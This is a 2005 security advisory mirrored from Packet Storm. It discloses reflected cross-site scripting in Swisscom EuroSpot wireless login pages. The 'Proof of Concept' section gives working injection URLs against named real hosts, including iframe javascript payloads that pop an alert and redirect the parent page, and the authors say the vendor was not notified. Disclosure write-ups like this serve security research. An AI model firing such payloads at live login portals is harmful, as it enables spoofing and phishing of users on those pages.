Lucene search
K

swisscom-XSS.txt

🗓️ 30 Oct 2005 00:00:00Reported by deepquestType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 169 Views

Swisscom EuroSpot XSS vulnerability in login pag

Code
` ___ ___ ___  
/__/\ /__/\ /__/\  
\ \:\ \ \:\ \ \:\  
\__\:\ \__\:\ \ \:\  
___ / /::\ ___ / /::\ ___ \ \:\  
/__/\ /:/\:\ /__/\ /:/\:\ /__/\ \__\:\  
\ \:\/:/__\/ \ \:\/:/__\/ \ \:\ / /:/  
\ \::/ \ \::/ \ \:\ /:/  
\ \:\ \ \:\ \ \:\/:/  
\ \:\ \ \:\ \ \::/  
\__\/ \__\/ \__\/  
  
  
  
"It's secure, it's reliable, it's Swiss"  
  
  
HHU  
---  
Homeless Hackers United is a small group of homeless hackers from   
Europe and  
North America. We can't afford paying for Internet access or hotel   
rooms.  
Our only crime is to have a laptop and wireless card, and few knowledge.  
Homeless state give us the freedom to access and use various open   
systems,  
accessible from public places.  
  
Who  
---  
Swisscom EuroSpot is a wireless service offered in airports, hotels and  
other public places. Customers buy certain amount of time online and   
get access  
to the wireless network. The login page is of course open in order to   
join and  
subscribe to the service.  
HHU has been able to access, and validate around several hotels and   
public  
places.  
  
Severity  
--------  
Medium  
  
Vulnerability  
-------------  
XSS, URL evasion  
  
Details  
-------  
Swisscom access point seems to use radius servers to provide internet   
access to  
their customers. We also noticed issues on the radius   
authentification process  
that may be published later. After joining the network you will have   
either to  
buy access time or login. The following has been tested in UK,   
Germany, France  
and Norway.  
  
http://login**.swisscom-eurospot.com/error.php?   
error=nasunknown_ui&UI=XSS  
http://login**.swisscom-eurospot.com/login.php?   
LANG=de&UserID=0&RadiusReply=XSS  
  
Proof of Concept  
----------------  
http://login02.swisscom-eurospot.com/error.php?   
error=nasunknown_ui&UI=Please%20fix%20this%20site  
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=   
%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E  
http://login02.swisscom-eurospot.com/error.php?error=nasunknown_ui&UI=   
%3CIFRAME%20SRC=javascript:window.parent.location.replace(%2527http://   
google.com%2527)%3E%3C/IFRAME%3E  
  
Impacts  
-------  
Change, spoof and fool end-users on login page or paiement page. With   
a bit on  
imagination it can be worst.  
  
Timeline  
--------  
Discovered: august 14th 2005  
Disclosure: october 28th 2005  
Service Provider: no  
  
HHU Policy  
----------  
HHU can't even afford food, and we're are not paid to debug softwares   
or systems  
for free.  
We discover, then publish what we find. Will route tcp/ip packets for   
food!  
"Fool me once, shame on — shame on you. Fool me — you can't get   
fooled again."  
— George W. Bush  
  
  
HHU Credits  
-----------  
deepquest for discovering and POC, Mescalito for more POC.  
original post http://deepquest.code511.com/blog/more.php?id=319_0_1_0_M`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Oct 2005 00:00Current
7.4High risk
Vulners AI Score7.4
169